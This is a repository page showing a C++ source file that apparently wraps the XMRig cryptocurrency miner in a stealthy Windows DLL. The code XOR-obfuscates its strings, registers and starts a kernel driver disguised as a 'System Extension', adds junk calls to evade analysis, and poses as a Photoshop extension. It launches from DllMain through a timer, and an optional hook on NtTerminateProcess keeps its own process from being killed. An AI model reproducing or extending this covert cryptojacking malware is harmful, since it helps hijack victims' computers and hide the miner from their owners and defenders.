jory/xmrig-minimized
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
0667011c20
xmrig-minimized/src/xmrig.cpp.bak

147 lines
8.4 KiB
C++
Raw Blame History

#include "App.h"
#include "base/kernel/Entry.h"
#include "base/kernel/Process.h"
#include <windows.h>
#include <winnt.h>
#include <string>
#include <cstring> // for strcpy
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
#define DLL_EXPORT
#endif
namespace test {
xmrig::Process* process = nullptr;
xmrig::App* app = nullptr;
}
// Simple XOR decrypt (key 0xAA; change per build)
inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) {
std::string dec(len, 0);
for (size_t i = 0; i < len; ++i) {
dec[i] = (char)(enc_str[i] ^ key);
}
return dec;
}
extern "C" {
// Core persistent logic (with encrypted strings as unsigned char to avoid narrowing)
void start_a(int argc, char** argv) {
using namespace xmrig;
using namespace test;
// Encrypted strings (XORed originals, stored as unsigned char)
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub"
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys"
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension"
// Decrypt
std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1);
std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1);
std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1);
// Load service (your existing logic)
SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager) {
SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS);
if (!hService) {
hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(),
SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL);
}
if (hService) {
StartServiceA(hService, 0, NULL);
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCManager);
}
// Junk benign calls
for (int i = 0; i < 5; ++i) {
GetSystemMetrics(SM_CXVIRTUALSCREEN);
}
// Core XMRig
process = new xmrig::Process(argc, argv);
const xmrig::Entry::Id entry = xmrig::Entry::get(*process);
if (entry) {
xmrig::Entry::exec(*process, entry);
return;
}
app = new xmrig::App(process);
app->exec();
}
DLL_EXPORT int test_start(int argc, char** argv) {
start_a(argc, argv);
return 0;
}
DLL_EXPORT void test_stop() {
using namespace test;
if (!app) return;
// app->onConsoleCommand((char)3); // Uncomment if needed
}
VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) {
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll"
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// start_a(argc, argv);
}
#ifdef USE_DETOURS
#include <detours.h>
static NTSTATUS (NTAPI *OriginalNtTerminateProcess)(HANDLE, NTSTATUS) = NULL;
NTSTATUS NTAPI HookedNtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) {
if (ProcessHandle == GetCurrentProcess() || ProcessHandle == (HANDLE)-1) {
return STATUS_ACCESS_DENIED;
}
return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS;
}
#endif
}
// Minimal DllMain (hTimer declared outside switch to fix scope jump)
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
// Deferred timer
CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD);
#ifdef USE_DETOURS
// Deferred hook via APC (simple function pointer instead of lambda for compat)
auto hook_func = [](ULONG_PTR param) -> void {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
// Encrypted API name
const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess"
std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1);
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str());
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
};
QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0);
#endif
break;
case DLL_PROCESS_DETACH:
#ifdef USE_DETOURS
if (OriginalNtTerminateProcess) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
}
#endif
return FALSE;
}
return TRUE;
}
Reference in New Issue View Git Blame Copy Permalink